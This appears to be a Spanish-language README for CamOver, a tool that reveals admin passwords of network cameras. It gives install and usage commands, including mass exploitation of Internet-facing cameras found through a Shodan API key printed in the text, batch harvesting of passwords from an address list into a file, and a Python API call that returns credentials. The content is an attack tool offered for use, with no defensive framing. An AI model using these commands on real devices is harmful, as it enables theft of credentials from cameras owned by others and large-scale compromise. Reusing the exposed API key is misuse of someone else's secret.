
CamOver es una herramienta de explotación de cámaras que permite revelar la contraseña de administrador de la cámara de red.
CamOver es una herramienta de explotación de cámaras que permite revelar la contraseña de administrador de la cámara de red.
CCTV, GoAhead y Netwave.pip3 install git+https://github.com/EntySec/CamOver
Para usar CamOver simplemente escribe camover en tu terminal.
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.
optional arguments:
-h, --help show this help message and exit
-t, --threads Use threads for fastest work.
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
Explotando una sola cámara
Hackeemos mi cámara solo por diversión.
camover -a 192.168.99.100
Explotando cámaras desde Internet
Intentemos usar el motor de búsqueda Shodan para explotar cámaras a través de Internet, lo usaremos con -t para una explotación rápida.
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
NOTA: La clave de API de Shodan dada (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) es mi clave PRO, puedes usar esta clave o la tuya propia, siéntete libre de usar todos nuestros recursos de forma gratuita :)
Explotando cámaras desde un archivo de entrada
Intentemos usar una base de datos abierta de cámaras con -t para una explotación rápida.
camover -t -i cameras.txt -o passwords.txt
NOTA: Explotará todas las cámaras en la lista cameras.txt por sus direcciones y guardará todas las contraseñas obtenidas en passwords.txt.
CamOver también tiene su propia API de Python que se puede invocar importando CamOver en tu código.
from camover import CamOver
Estas son todas las funciones básicas de CamOver que se pueden usar para explotar una cámara especificada.
exploit(address) - Explota una sola cámara por la dirección dada.Explotando una sola cámara
from camover import CamOver
camover = CamOver()
creds = camover.exploit('192.168.99.100')
print(creds)